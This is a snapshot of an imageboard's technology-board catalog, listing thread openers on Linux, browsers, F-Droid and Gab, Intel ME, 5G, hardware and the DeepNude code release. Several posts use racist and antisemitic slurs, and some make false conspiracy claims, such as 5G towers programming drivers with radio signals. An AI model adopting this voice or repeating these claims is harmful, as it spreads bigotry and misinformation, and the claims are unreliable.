[ / / / / / / / / / / / / / ] [ dir / 8cup / animu / b4 / dempart / freeb / lego / lounge / randamu ]

Catalog (/tech/)

Winner of the 83rd Attention-Hungry Games
/strek/ - Remove Hasperat

May 2019 - 8chan Transparency Report
[Create a thread]
Sort by: Image size: [Show all] Archive
R: 1 / I: 0 / P: 1 [R] [G] [-]

Welcome to /tech/ - ∞chan's technology board.

Please check the rules before you post:


Looking for hardware or software recommendations? Check out the InstallGentoo Wiki:


/tech/ is for the discussion of technology and related topics.

/tech/ is NOT your personal tech support team or personal consumer review site. We have stickies for that. Keep those kinds of posts in there.

For tech support, software recommendations, and other questions that don't warrant their own thread, please use the '/tech/ Questions and Support' sticky.

For consumer advice, please use the consumer advice sticky located below.

For meta discussion, please go to >>>/metatech/.

For desktop threads, homescreen threads and ricing, please go to >>>/rice/.

For tech support/issues with computers:

https://startpage.com/ or https://ixquick.com (i.e., fucking Google it)



If you can't find what you're looking for and still need help, post in the tech questions sticky.

Looking to switch over to GNU/Linux? Don't know where to start?




∞chan Android apps







The Case Against Google Chrome


/tech/ FAQs - Email Services


/tech/ FAQs - DuckDuckGo


/tech/ Resources and Information


Windows 7 Telemetry Removal


/tech/ IRC

irc://irc.rizon.net #/tech/



You can search the catalog for a specific term by using:


Always check the catalog before creating a thread.

To use the Code tag, book-end your body of code with:


This is a SFW board; however, NSFW (Nudity, gore, etc.) material may be uploaded so long as it is spoilered. If you are browsing at work or similar, assume spoilered images are not safe for work.

If you see any posts that break the rules, please report them. Thanks!

You can find the public /tech/ volunteer action log at https://8ch.net/log.php?board=tech

To appeal a ban longer than 1 week, feel free to use the email provided or use the built-in appeal system. Be sure to attach a screenshot of your ban message when submitting an appeal via e-mail.

R: 400 / I: 79 / P: 1 [R] [G] [-]

/tech/ Questions and Support

Bring all your hardware, software and other troubles here.

R: 400 / I: 73 / P: 1 [R] [G] [-]

Consumer Advice

Looking to buy something but aren't sure what to get? Ask here.

R: 31 / I: 0 / P: 1 [R] [G] [-]

Microsoft Voting Machines



>Microsoft on Wednesday announced that it would give away software designed to improve the security of American voting machines, even as the tech giant said it had tracked 781 cyberattacks by foreign adversaries targeting political organizations so far this election cycle.

>The company said it was rolling out the free, open-source software product called ElectionGuard, which it said uses encryption to "enable a new era of secure, verifiable voting." The company is working with election machine vendors and local governments to deploy the system in a pilot program for the 2020 election.

>Last August, Microsoft rolled out a service it calls AccountGuard, now in use in 26 countries on four continents. The company provides it free to current candidates for federal, state and local offices in the United States and their campaigns, the campaign organizations of all sitting members of Congress, national and state party committees, technology vendors who primarily serve campaigns and committees, and certain nonprofit organizations and nongovernmental organizations. Microsoft AccountGuard is offered free of charge. Organizations must be using Microsoft's Office 365 software suite to register.

So Microsoft is willing to manage our elections and all our officials account security all for free. How fucking generous of them. I swear to god this better not get adopted.

R: 132 / I: 19 / P: 1 [R] [G] [-]

F-Droid bans Gab for being a “free speech zone” that will “tolerate all opinions”

The free and open-source software (FOSS) Android repository F-Droid has issued a statement saying that it won’t distribute any apps that promote free speech social network Gab because it’s a “free speech zone” that will “tolerate all opinions.” The decision comes after other apps and websites in the Fediverse, a decentralized collection of blogging and social networking projects, have attempted to censor Gab and goes against the very nature of FOSS.

F-Droid posted a statement about its decision to block Gab apps titled “Public Statement on Neutrality of Free Software” which ironically explains why F-Droid is going against its longstanding principle of staying neutral. The statement also strangely never mentions Gab by name, even though the entire statement is clearly about Gab, and instead refers to it as “a website.”

The statement starts by positioning Gab’s commitment to free speech and diverse opinions as a bad thing:

“To recap the situation: a website joined the fediverse only half a month ago that is well known to be a “free speech zone”, meaning it claims to tolerate all opinions. While in theory this might seem to be a good concept, it has serious consequences: things like racism, sexism, verbal abuse, violent nationalist propaganda, discrimination against gender and sexual minorities, antisemitism and a lot more things become popular on such instances.”

Further on in the statement, F-Droid says that as its ninth birthday approaches, it will be abandoning its history of staying neutral in order to censor Gab:

“F-Droid as a project soon celebrates its 9th birthday. In these 9 years, F-Droid’s mission was and is to create a place where people could download software they can trust – meaning only free, libre and open source software is available on its flagship repository. As a project, it tried to stay neutral all the time. But sometimes, staying neutral isn’t an option but instead will lead to the uprise of previously mentioned oppression and harassment against marginalized groups. We don’t want and won’t support that. F-Droid is taking a political stance here. F-Droid won’t tolerate oppression or harassment against marginalized groups. Because of this, it won’t package nor distribute apps that promote any of these things. This includes that it won’t distribute an app that promotes the usage of previously mentioned website, by either its branding, its pre-filled instance domain or any other direct promotion.”

F-Droid then goes on to say that “moderation” is necessary to prevent “oppression and harassment” from flourishing. This decision by F-Droid is the latest example of censorship that Gab has faced since joining the Fediverse. Prior to the F-Droid ban, numerous Fediverse apps have blocked connections to Gab servers and Google has also said that Gab’s app will be banned from the Google Play Store on July 19 unless it complies with an impossible list of demands.

The censorship Gab has faced from those in the Fediverse directly conflicts with the Four Essential Freedoms of Free Software which people in this community supposedly uphold. Most notably, censoring Gab goes against the first of these freedoms – “the freedom to run the program as you wish, for any purpose.”

Since Gab is the largest node in the Fediverse and recently passed 1 million users, welcoming Gab would likely have provided F-Droid and other developers in the Fediverse with a huge boost in new users. However, they seem willing to sacrifice both the freedoms of free software and potential user growth in order to censor Gab.

Despite this wave of censorship from F-Droid and others, some app developers are staying true to the freedoms of free software and supporting connections to Gab’s servers.

Gab has responded to F-Droid’s decision by branding them as cowards and announcing plans to fork F-Droid’s repository.


R: 49 / I: 5 / P: 1 [R] [G] [-]

Static/Dynamic Linking and the Administrator and User

So there’s this sort of debate in GNU/Linux between Static and Dynamic linking. Really this is also framed as a debate between musl, which lists static linking as a selling point, and the popular glibc, which afaik dropped static support and only does dynamic linking.

So different C koders have different views on this, but I wanted to see what this might mean for the recipients of the compiled binaries. What would this mean for the end user or an admin in handling their systems. How would performance change? Would anyone have to do anything different? What about compiling a program that’s not in the repos and has no packaged version? Does that change?

Which one is truly better for everyone in the long run?

R: 359 / I: 100 / P: 1 [R] [G] [-]

Old Hardware Thread

The old thread passed the bump limit so I figured I'd make a fresh one. Discuss your old hardware. Are you fixing anything?

I have an IDE to mSATA adapter and an mSATA SSD coming in the mail to fix my thinkpad.

R: 9 / I: 0 / P: 1 [R] [G] [-]

TextBin - Hybrid Pastebin + Chan

I've had this idea for a bit, so I finally decided to execute it.



is a hybrid text/HTML hosting and chan website that is focused on anonymity and forgetfulness. All source code is freely available, all IP addresses are hashed, and all data sudmitted to the site is deleted after 24 hours.

The frontend is written as a SPA using Vue, and the backend is written in Java with the Vert.x framework, running on a custom application server. It uses PostgreSQL as a database, and connects with a Hikari connection pool.

R: 7 / I: 0 / P: 1 [R] [G] [-]

Adblockers block 8ch from loading

Hi guys. All of the adblockers are now blocking this site from loading. Do you know what list(s) the site has been added to?

How do we defeat this latest attempt?

R: 12 / I: 1 / P: 1 [R] [G] [-]

If light is the fastest known thing in the universe...why arent we using freaking wireless lasers bounced off a mirror on a satellite to communicate on the internet. Whats the practical problem here seriously. Have a dozen major relay centers, NYC, LA TOKYO, LONDON, etc, wire fiber optics from those relay centers to peoples homes, bang, speed of light full duplex communication. 1 TB speed minimum for everyone.

R: 35 / I: 2 / P: 1 [R] [G] [-]

Pleroma and the Fediverse

Pleroma is a decentralized twitter alternative, like mastadon, and part of the fediverse, where various twitter like social media posts can cross-post. https://pleroma.social/

Josh, of InfinityNever fame, has created a KiwiFarms instance that allows kiwis to create accounts and post.

Ron should create an 8ch instance to remain competitive in the shitposting website business.

Make sure to let every board know about it too!

R: 15 / I: 4 / P: 1 [R] [G] [-]

Summer 2019 Infinity Cup

A reminder, you have less than two weeks to submit your logo, 3 kits, and base roster to the 8cup thread to secure your entry into the 2019 Summer Cup.



If you want to use your old roster (link above), just say so.

R: 100 / I: 11 / P: 1 [R] [G] [-]

Ubuntu will drop 32-bit x86 arch entirely. If you ever needed an excuse to ditch this absolute joke of a disto in favor of the one they've been copying for years, now would be a good time.


R: 112 / I: 23 / P: 1 [R] [G] [-]

Windows Thread

ITT we discuss Windows.

>first/most memorable




I'm trying to decide on a Windows OS for my VM, I was thinking of Windows 8.1. Is Win10 LTSC a better choice? I've been running a Win7 VM for a long time but 8.1 seems to perform better, I'm mainly worried about the telemetry pozz, is Win10 LTSC still knee-deep in it or should I stick with a Win7 VM?

R: 231 / I: 36 / P: 2 [R] [G] [-]


With the absurd amount of shilling that this gets from (((influencers))) I can't help to believe that NordVPN is some kind of honeypot and/or botnet. There is no way that they can be shilling to so many influencers and have so many organic "how do I use this service" posts on the net.

I am surprised cianigger is not posting regular threads on this subject stressing people to use obviously untrustworthy software.

R: 61 / I: 5 / P: 2 [R] [G] [-]

The Death Of FAANG

Have you noticed anything recently?

None of the cool kids are on Facebook anymore, it's just moms. People increasingly distrust Facebook and it's creepy leader.

Instagram is now regularly having outages along with bugs that haven't been fixed in years.

YouTube's user base is increasingly frustrated, creators aren't making money on the platform and the jurnos are at it again with the manufactured controversy.

Google, who used to have 99.999999% uptime had Google Cloud go down recently and today Google Calendar went down, probably costing hundreds of millions in damage.

The time has come for Rome.

R: 94 / I: 15 / P: 2 [R] [G] [-]

Are you ready for a subscription internet, goy?




Mozilla set to offer ad-free browsing in Firefox for $5

>The idea is a simple one, goy. You pay a monthly fee to Mozilla, and this money is shared with its partners to help fund an ad-free internet experience.

>Fagzilla says:

<We've partnered with some of the world's greatest publishers to bring you a better journalism experience. We share your payment directly with the sites you read. They make more money which means they can bring you great content without needing to distract you with ads just to keep the lights on.

<Subscribers also get access to audio versions of articles, bookmarks that are seamlessly synced across devices, exclusive top recommended reads, and an app that helps you find and finish great content, all without the distraction of advertising [...] No matter how you find an article, Mozilla’s ad-free experience is there. Whether you discover content in blogs or on apps like Twitter and Reddit, whether you’re on desktop or mobile, it just works [...] When life interrupts your reading, Mozilla helps you automatically pick up where you left off. Find a story on your laptop and resume from the same spot on your phone. Need to get in the car? Switch to audio on the go

Looks like they are going to start charging for synchronizing your bookmarks as well.

Its only a matter of time before Jewgle and Kikerosoft copy this as well, and then it is goodbye to the free and open internet.

>A-at least now that we are paying, we won't be the product anymore, right?

R: 111 / I: 10 / P: 2 [R] [G] [-]

Qutebrowser Thread

Why aren't you using Qutebrowser, /tech/?

I started using it a couple of weeks ago and honestly I can't imagine going back to Firefox+vimperator/tridactyl.

It's much faster and more responsive than Firefox, it respects the user and the UI is nice, simple and functional.

It uses QtWebEngine in the backend, which is basically ungoogled chromium code wrapped in Qt (https://wiki.qt.io/QtWebEngine)

It supports greasemonkey scripts (which can be used for user CSS as well), it's got a basic ad blocker and even the web inspector thing.

It's got pretty much everything you'd need and it also has some neat features you never knew you needed like external editor support and whatnot.

There's also an umatrix implementation in development: https://gitlab.com/jgkamat/jmatrix

Honestly, Qutebrowser is top comfy.

You should try it, especially if you're partial to keyboard driven browsing and are sick of Mozilla and their shit.

Even if you aren't a Vim user and have never used addons like vimperator and whatnot, you should still give it a chance.

You have no idea of the comfyness and efficiency you're missing out on.

The modern web is shit all in all, but Qutebrowser at least makes it bearable, if not somewhat enjoyable to browse.

R: 151 / I: 23 / P: 2 [R] [G] [-]

Raspberry Pi 4 has been announced. It looks like it's using VC5 because there's actually 1GB 2GB and 4GB versions.

ARM Cortex-A72 @1.5GHz, Wifi, Bluetooth, GbE, and USB3, as well as 2 micro HDMI ports.

R: 119 / I: 54 / P: 2 [R] [G] [-]

DeepNude source released


>The original DeepNude Software and all its safety measures have been violated and exposed by hackers. It no longer makes sense to hide the code. DeepNude uses an interesting method to solve a typical AI problem, so it could be useful for researchers and developers working in other fields such as fashion, cinema and visual effects.

>This repo contains the core algorithm, not the user interface.

R: 150 / I: 17 / P: 2 [R] [G] [-]

All computers since 2003 can read your keystrokes, screen, files

Full remote backdoor available in all Intel and AMD computers since 2003

All your keystrokes, screens, files can be remotely read or modified on demand at any time by MOSSAD, even if your PC is turned off. That includes your encryption password.

Pre-PSP and pre-ME cpu's are not safe. ASF and DASH are previous versions of PSP/ME botnet. ASF --> DASH --> ME/PSP


Alert Standard Format (ASF) (also sometimes referred to as Alert Standard Forum, Alerting Specifications Forum, Alert Specification Function, etc.) is a DMTF standard for remote monitoring, management and control of computer systems in both OS-present and OS-absent environments.


>DASH provides support for the redirection of KVM (Keyboard, Video and Mouse) and text consoles, as well as USB and media, and supports the management of software updates, BIOS (Basic Input Output System), batteries, NIC (Network Interface Card), MAC and IP addresses, as well as DNS and DHCP configuration. DASH specifications also address operating system status, opaque data management, and more.

they can access your keyboard, video, mouse over the internet


Desktop and mobile Architecture for System Hardware (DASH) is a Distributed Management Task Force (DMTF) standard.

>Intel Active Management Technology is a compliant implementation of DASH.


>Intel Active Management Technology (AMT) is hardware and firmware technology for remote out-of-band management of personal computers,[1][2][3][4][5] running on the Intel Management Engine, a separate microprocessor not exposed to the user, in order to monitor, maintain, update, upgrade, and repair them.

>Intel confirmed a Remote Elevation of Privilege bug (CVE-2017-5689, SA-00075) in its Management Technology on May 1, 2017.[12] Every Intel platform with either Intel Standard Manageability, Active Management Technology, or Small Business Technology, from Nehalem in 2008 to Kaby Lake in 2017 has a remotely exploitable security hole in the ME. [13][14] Some manufacturers, like Purism[15] and System76[16] are already selling hardware with Intel Management Engine disabled to prevent the remote exploit. Additional major security flaws in the ME affecting a very large number of computers incorporating Management Engine, Trusted Execution Engine, and Server Platform Services firmware, from Skylake in 2015 to Coffee Lake in 2017, were confirmed by Intel on November 20, 2017 (SA-00086).



>AMD PRO A-Series platforms utilizing DASH manageability enable manageability features you need and want. These affordable, easy-to-use management tools and features enable remote management of client systems, whether they are powered on (in-band) with a responsive operating system (in-service), or when the clients are powered off (out-of-band) or have a non-responsive operating system (out-of-service). Our powerful management tools also offer remote diagnostics and troubleshooting, asset management, automated system startup and shut down.



>Client systems that support out-of-band management help IT administrators perform tasks independent of the power state of the machine or the state of the operating system. Examples of out-of-band management tasks include: 1) Securely starting up a system remotely, even if it is currently powered off; 2) Viewing asset inventory information for a system that is powered off; 3) Retrieving health information about system components even if the OS is unavailable.

(body too long)

R: 58 / I: 5 / P: 2 [R] [G] [-]


>What the fuck is going on

Youtube is removing any tech related videos that talk about exploits in systems, malware analysis, hacking tutorials, ways to escape the botnet, malware creation, console hacking and anything cyber security releated.

>How are we backing this up?

Use youtube-dll. I'm not sure what site we will use to back up all this shit but mega.nz and bitchute are good enough for now. I would personally have a hdd backup since other websites cannot be trusted

>What other shit will youtube remove?

Any new stuff is unclear but we need to back this shit up before it gets removed.

>Why should we back up this shit?

Most videos have no other backups and they have good info that gives us more knowledge to protect ourselves.

R: 214 / I: 35 / P: 2 [R] [G] [-]

Migrating from Ubuntu/ Debian Mate to OpenBSD, CalmWindowManager. A blog.

>be me

>a hwite cis male w/ penis intact

>hate the b l o a t of Linux, especially ubuntu, especially gnome

>even gnome 2 (mate), your old standby, seems bloated

>don't want to deal with gentoo suit

>hate the fragmentation

>hate the gpl

>hate the CoCk

>plan9 is literally retarded

>9front is 3edgy5me

>haiku is a forever early beta


<absolutely proprietary

>give openBSD a download

>install it on my core2duo machine

>connect to wifi with a config file


>start x with xenodm

>all of cwm's configs in one file

>so simple

>so well documented

>man [ ] pages make sense

>tmux just as good if not better than gnuScreen

>the install was a walk in the park

>easier than debian minimal tbqh

>forced me to learn vi instead of nano

>honestly it's much better

I took the BSD pill. Will you? Or will you keep taking Linus's CoCk and letting Stallman tell you what freedom "really is"???

R: 104 / I: 15 / P: 2 [R] [G] [-]

systemd free distro

what is the ultimate systemd free distro?


too many of them

doesn't have to be linux, so bsd or other shits also allowed

requirement: has to support web browser. the only acceptable web browser to use is Tor Browser. so it has to support it

R: 29 / I: 8 / P: 2 [R] [G] [-]

Mastodon Network - Review

What is Mastodon?

Mastodon is a Twitter alternative that allows anyone to run their own Server that can host users. People make an account on any Server that someone else has set-up. From there, you can “Follow” another user by going to their Profile Page, even if it’s located on another Server. Because all these

machines are running their own version of Mastodon (Called an ‘Instance’).

Their posts, called Toots, will appear in your Home-feed and your Servers Federated timeline.

Fediverse: Derived from the word “Federated” (Smaller entities, united within an alliance), this describes a Network of computers that implement (To put into effect) the ‘ActivityPub’ standard. This is an open-source distribution of Software updates that allows internet servers to interlope with one another. Hence, the word ‘Federated’. However, different programs or ‘Networks’ such as PixelFed (An alternative to Instagram) do not allow you to ‘follow’ their users from the Mastodon Network, even though they use the same protocol.

Internet Protocol: Rules for processing data in a format that can be transmitted between computers.

So content from other networks cannot be viewed without leaving the Mastodon platform. One minor exception to this is when a URL of a PeerTube video is tooted, it will appear directly in your feeds as an mp4 file, instead of just a link. But this is simply not the case with other programs, such as PixelFed.

While it’s possible for external content to be conveyed across different Networks, it is not made clear which Networks can share what information with Mastodon.

Note: Strangely enough, ‘SoundCloud’ music tracks can also be posted to the feed. Complete with the same waveform graphic that you’d find on the main website, instead of a buffer-bar. Perhaps future improvements will allow it’s users to post from outside the Mastodon Network and have it appear in their feeds, but it’s obvious they have a long way to go before that happens.

How to use Mastodon

There isn't a clear guide on how to use its features and what you can or can’t do. After some experimenting, I've put what I found into a condensed list:

(1) The initial Mastodon UI resembles the app called “Tweet-deck” for Twitter users. Here, Several rows of columns display different categories of information simultaneously. This User-interface (UI) is known as the ‘Front-end’ of a server and there are other Front-ends or flavours of Mastodon made for both Desktops and Phones. https://joinmastodon.org/apps

Notable examples are:

i. Halcyon (Made to resemble Twitter) https://www.halcyon.social/

ii. Whalebird (Has an appearance very similar to Discord) https://whalebird.org/en/desktop/contents

iii. Thedesk (Enhanced version of the default UI that runs on the Desktop) https://thedesk.top/en/

R: 45 / I: 3 / P: 2 [R] [G] [-]

Year of the Linux ARM Laptop


Pinebook Pro pre-orders start July 25

forum members get priority. fuck.


Let’s talk a bit about the state of Linux for the Pinebook Pro. As far as Linux on ARM development goes, I can say with confidence that we’re in what I like to call the luxury territory. What I mean by this is that everything works – some things better than others, but it’s all there – and there are no deal-breaking issues in any of the builds. Developers have effectively moved from ‘making things work’ to ‘making things work better’ in the past two months. Improvements are literally done daily, if not hourly, and everything from desktop acceleration to trackpad settings and battery-life is being continually tweaked. Regarding the custom Debian build that will ship with the Pinebook Pro – at the time of writing we still have about two weeks to continue tweaking things so they work their best. You will, of course, likely want to hit the update icon when you get your laptop, which will update the kernel and numerous other things, as well as run your regular apt updates and upgrades.


That said, cool things have been done to improve battery life on the kernel level. MrFixit2001 has managed to make the governor monitor activity, so that not only does it set the frequency of the cores but also automatically turns the cores on and off on a need-be basis. We expect that this will see a significant improvement to battery life as well as thermals whilst having a relatively small impact on performance. From my testing, relative to all cores being active and the default interactive governor settings being applied, running webGL demos and playing simple games the observable performance difference is really negligible (for reference, 5 FPS difference running Aquarium WebGL demo). This is a very cool trick and one will be further improved upon and find its way into the majority, if not all, OS’ for the Pinebook Pro. Lastly, I think its worth noting that you can also turn individual cores on and off manually from the userspace for cores cpu0-5 (exchange value for X), which comes in handy if all you’re doing is terminal work or taking notes in class: echo 0 > /sys/devices/system/cpu/cpu0/online. This applies to all current Linux builds.

>privacy switches

There are three privacy switches mapped to the F1, F2 and F3 keys on the Pinebook Pro keyboard. They deactivate the following: 1) the BT/WiFi module; 2) the webcam; and 3) the microphones. I’ll give you a broad overview of how the switches work and answer the inevitable questions about their security. The keyboard has a special firmware that lives on, and operates separately of, the operating system. In a nutshell, it detects if F1, F2 and F3 keys are pressed for 10s. Once one of the keys get pressed for the set duration, the keyboard firmware cuts power to the chosen aforementioned peripheral. The implementation is no different to cutting a peripheral power mechanically via a physical switch, and the power state settings for each is stored across reboots.


there's nothing on the link about pre-disabling Intel ME or AMD ST because that shit was never present in the first place

R: 208 / I: 54 / P: 2 [R] [G] [-]

ThinkPad (and Toughbook) thread

IBM ThinkPad edition. As usual, the old one hit 400 posts again.

>tfw 2 of the 3 T2x ThinkPads I own have cracked palmrests

R: 66 / I: 7 / P: 2 [R] [G] [-]

Rust wins again - D bites the Dust

Ownership and Borrowing in D

Nearly all non-trivial programs allocate and manage memory. Getting it right is becoming increasingly important, as programs get ever more complex and mistakes get ever more costly. The usual problems are:

>memory leaks (failure to free memory when no longer in use)

>double frees (freeing memory more than once)

>use-after-free (continuing to refer to memory already freed)

The challenge is in keeping track of which pointers are responsible for freeing the memory (i.e. owning the memory), which pointers are merely referring to the memory, where they are, and which are active (in scope).

The common solutions are:

>Garbage Collection – The GC owns the memory and periodically scans memory looking for any pointers to that memory. If none are found, the memory is released. This scheme is reliable and in common use in languages like Go and Java. It tends to use much more memory than strictly necessary, have pauses, and slow down code because of inserted write gates.

>Reference Counting – The RC object owns the memory and keeps a count of how many pointers point to it. When that count goes to zero, the memory is released. This is also reliable and is commonly used in languages like C++ and ObjectiveC. RC is memory efficient, needing only a slot for the count. The downside of RC is the expense of maintaining the count, building an exception handler to ensure the decrement is done, and the locking for all this needed for objects shared between threads. To regain efficiency, sometimes the programmer will cheat and temporarily refer to the RC object without dealing with the count, engendering a risk that this is not done correctly.

>Manual – Manual memory management is exemplified by C’s malloc and free. It is fast and memory efficient, but there’s no language help at all in using them correctly. It’s entirely up to the programmer’s skill and diligence in using it. I’ve been using malloc and free for 35 years, and through bitter and endless experience rarely make a mistake with them anymore. But that’s not the sort of thing a programming shop can rely on, and note I said “rarely” and not “never”.

Solutions 2 and 3 more or less rely on faith in the programmer to do it right. Faith-based systems do not scale well, and memory management issues have proven to be very difficult to audit (so difficult that some coding standards prohibit use of memory allocation).

But there is a fourth way – Ownership and Borrowing. It’s memory efficient, as performant as manual management, and mechanically auditable. It has been recently popularized by the Rust programming language. It has its downsides, too, in the form of a reputation for having to rethink how one composes algorithms and data structures.

The downsides are manageable, and the rest of this article is an outline of how the ownership/borrowing (OB) system works, and how we propose to fit it into D. I had originally thought this would be impossible, but after spending a lot of time thinking about it I’ve found a way to fit it in, much like we’ve fit functional programming

into D (with transitive immutability and function purity).


R: 15 / I: 3 / P: 2 [R] [G] [-]

Cool tech

Lets talk about interesting shit in IT anons, like data diodes and QRNGs.

R: 80 / I: 6 / P: 3 [R] [G] [-]

linux is bloated malware

>consider installing devuan (debian without systemd)

>installer is 4GB

>consider installing OpenBSD

>installer is 0.4GB

why is linux so bloated and shit?

why don't they provide light and fat installers?

light = kernel, one desktop environment, some crucial software

fat = few desktop environments, a lot of software

any why is linux so bloated even in standard installer?

R: 58 / I: 18 / P: 3 [R] [G] [-]

Youtube blocking Tor connections

I noticed this began happening a few weeks ago. Before I don't think this happened on youtube, just when using google search.

Is this a good thing? On one hand this strategy of them will push us away from popular sites. On the other hand it could make alternatives like invidio.us more popular, just like it probably did for duckduckgo.

R: 26 / I: 2 / P: 3 [R] [G] [-]

Fedilab, Librem Social supports the pushing out of marginalized groups

>Welp, looks like @fdroidorg has explicitly said that they're opting for their privilege over other's safety.

>It's a *privilege* to not have to participate in politics. I would love to sit on the sideline and not have to do anything politically motivated, but my literal life is on the line thanks to the fascists trying to ban my existence as a trans woman.

>Until people understand that politics is not optional, we cannot hope to end this fight.

Why am I not surprised?


R: 81 / I: 10 / P: 3 [R] [G] [-]

Is SSD a failed technology? It does not provide any useful benefits, but is more expensive and fail a lot more than HDD

>SSDs under 2-3 years in age have a significantly lower ARR (Annual Replacement Rate) than hard drives. But as the SSD ages, the story changes. In some tests 20% of flash drives developed uncorrectable errors in a four-year period, which is considerably higher than hard drives.

>Additional tests over a 32-month period concluded that 30%-80% of flash drives developed bad blocks during their lifetime, while HDDs developed only 3.5% bad sectors. Since hard drive sectors are smaller than flash drive blocks, HDD sector failures impact less data.

R: 144 / I: 21 / P: 3 [R] [G] [-]

Browser ENGINE Thread

/tech/ has always been known for it's in depth browser threads, but how often do we really look under the hood and discuss the rendering engines that run these browsers and do most of the actual heavy lifting of displaying a webpage? Right now there are three main browser engines:

Webkit: Made by apple. Written in OOPC. Used by Safari. Has official Gtk+ binding for ease of use by pajeets. as easy as gtk+ can be, anyway. Also has external projects making bindings in many other languages.

Blink: Made by google. Originally forked from webkit. Written in C++. Used by Google Chrome. As far as I am aware, there are no bindings for it. If you want to roll your own browser with it, you better know what you're doing.

Gecko: Made by Mozilla. Infected with Rust. Used by Firefox. It used to be good before Mozilla went full retard. Like blink, there are no bindings for Gecko.

Other engines of note:

NetSurf: Originally built for RISC OS. Programmed in ANSI C. Doesn't have HTML 5 support, and is just starting to get Javascript support.

Goanna: Forked from Gecko. Used by Palemoon. Like Gecko used to be before Quantum and the webextensions bullshit.

Servo: Mozilla's experimental engine. Extremely infected with Rust.

R: 52 / I: 6 / P: 3 [R] [G] [-]

Where do we bitch about 5g

5g is USA's Credit System a la China. The 5g installations near traffic lights bomb nearby cars with a certain RF frequency to program a 'stop and go' response to anyone around. This can be used later.

I mean it's really simple programming that starts with the fundamental 'stop and go' of a traffic light.

Now imagine they don't like you. They hit you with the same 'stop' signal outside of some bar where you might pick up chicks to keep you segregated from society.

Imagine now not using a VPN and them tracking your internet usage and blasting you RF accordingly. You show an interest in guns and they hit you with positive RF signals whenever you're looking at guns online.

How much money can they steal from you using this shit? How many shootings will this shit cause? It's not just the Gov't with control of these towers. Google and Verizon both have direct control of this shit.

R: 31 / I: 3 / P: 3 [R] [G] [-]

Home Networking Advice

What routers is /tech/ using?

Oppinions about Router Combos?

R: 71 / I: 1 / P: 3 [R] [G] [-]

Which computer science study field has the most potential?

Right now, it seems Artificial intelligence and machine learning is looked for everywhere, and it seems to have a bright future. However, I think bio-informatics is the one with the most potential, medicine and computer science are the fields with the most rapid evolution.

i'll list some CS fields


Bio informatics

Computer graphics

Computer vision

Theoretical CS

Cryptology/cyber security

Quantum computation

Operations research

Data science

I'll be honest I'm soon entering a masters but I'm not sure what to specialize in so I created this thread to help me a little bit. Computer graphics looks fun but other fields seem to have a more promising future. Lets discuss CS fields.

R: 4 / I: 1 / P: 3 [R] [G] [-]

hey guys i need to commit code

>okay use our gitlab




R: 94 / I: 61 / P: 3 [R] [G] [-]

/tech/ webm thread

Been a while since we've had one of these.

R: 35 / I: 5 / P: 3 [R] [G] [-]

Securing your workplace computer

I'm going to stop being a NEET soon and I will have my own machine in the office. I get to set it up myself, so the software side is not a problem. It's the hardware I'm worried about, I don't want a co-worker to connect a keylogger to my keyboard cable before I come in to word, grab my password and then put CP or some shit on my computer after I go home to get me into trouble.

How can I secure my computer best? When it comes to the keyboard I can just bring my own from home, it's a mechanical keyboard, so I can come up with an excuse how "I'm really used to this one" or something autistic like that. But what about the tower itself? I can't start gluing security seal stickers on the case and check them every morning without looking like a paranoid weirdo.

I am going to use a diceware passphrase, six words should be enough, right? I use pass as my password manager, what is the best way of synchronizing passwords between different machines?

R: 30 / I: 3 / P: 3 [R] [G] [-]

does a 15 year old amd single core cpu contain a nsa backdoor?

R: 21 / I: 1 / P: 3 [R] [G] [-]

Is the CCNA a meme cert or will it actually get me out of help desk to become a network engineer?

R: 76 / I: 5 / P: 3 [R] [G] [-]

OK so hear me out.

Our modern transitors work by etching a specific serires of shapes onto scilicon and the patterns of those shapes make transitors. IT is a uniform pattern. However there is no particular reason why we have to use 1 bit transitors. For example we could use a ternary design.

What I propose is that you have an AI have complete control of how it would be etched and reward the ai when the etching produces the proper output and punish the ai when it is the improper output. Also reward the ai when the output speeds up and uses less power etc. And I propose to you that Ai will not resort to transistors. Depending on the chip you are trying to design the ai will choose an amorphous blob/shape that is optimized precicely to move the electrons how you want without any logic gates and that it will be supra ultra low power

R: 43 / I: 2 / P: 3 [R] [G] [-]

why only white men are software developers?

why are niggers and women discriminated and not hired as software developers?

if women are 50% of population, why don't we have 50% females in software development. if niggers are 10% of population why don't we have 10% niggers in software development.

what are the reasons?

R: 8 / I: 1 / P: 4 [R] [G] [-]

Can you guys tell me if there is a definitive guide to anything TOR/Dark Net related out there? Also, do you have to be rather tech-affine to get it or is a literal retard able to?

t. retard

R: 38 / I: 1 / P: 4 [R] [G] [-]

Do you believe thousands of kilometers of cables were placed under the sea by boats? Seems like a huge endevour, hard to convince governments to do without a very good reason. It seems it would be a huge task, a big deal, with movies about it, but it's barely discussed.

R: 17 / I: 1 / P: 4 [R] [G] [-]

fuck reCAPTCHA

how can i get rid of reCAPTCHA

i wanna bypass captcha (google version) to creat a script that unban my server ips that i use to send emails :D

R: 30 / I: 3 / P: 4 [R] [G] [-]

dear /tech/, I have a feeling.. I feel bored by programming lately. I need to respark my zest. I want to feel the same excitement I used to feel when I made my computer actually do things I wanted to, like back in the 80s and 90s. You know that feeling I describe? That "it works!" feeling. Work lately was endlessly boring. The code bases bloated, the languages ugly, the codemonkeys smelly and indian. There is no joy in that. There's no point in such a life. I need to find something /tech/. I need to find an aesthetically pleasing programming language. It also has to be efficient, as it cannot be slow or difficult by the computer to process, as that by definition cannot be aesthetically pleasing.

I've spend a lot of time today to look at the top programming languages and those farther away from the top but to be honest, a lot of them are very similar. Scripting languages seem interesting. Lua has something elegant, but some of the syntax is bizarre. Luajit is very fast. Tcl seems nice, but it is slow. I don't think I can go back to Fortran, it's a dead language and to be frank seeing it for what it is in my current state... it might kill me. So tell me /tech/, what do you use and what do you program for fun with it? Why does it please you? Don't tell me to kill myself, because I just might.

R: 30 / I: 2 / P: 4 [R] [G] [-]


>Golang is a community owned project

>It's a Google project so we won't remove the logo


R: 40 / I: 7 / P: 4 [R] [G] [-]

housing technology

What are all possible dwellings or places to live/sleep/eat? I am asking about both immobile like houses, flats, tree houses, and mobile like living in RV.

Post your ideas for housing and living, how much does it cost, it's pros and cons, how to build it. Let's do a tutorial how to fuck jews and their mortgage and slavery.

you can also post some new ideas and technology that is not yet used

R: 52 / I: 4 / P: 4 [R] [G] [-]

Signal Messaging Protocol/ Service

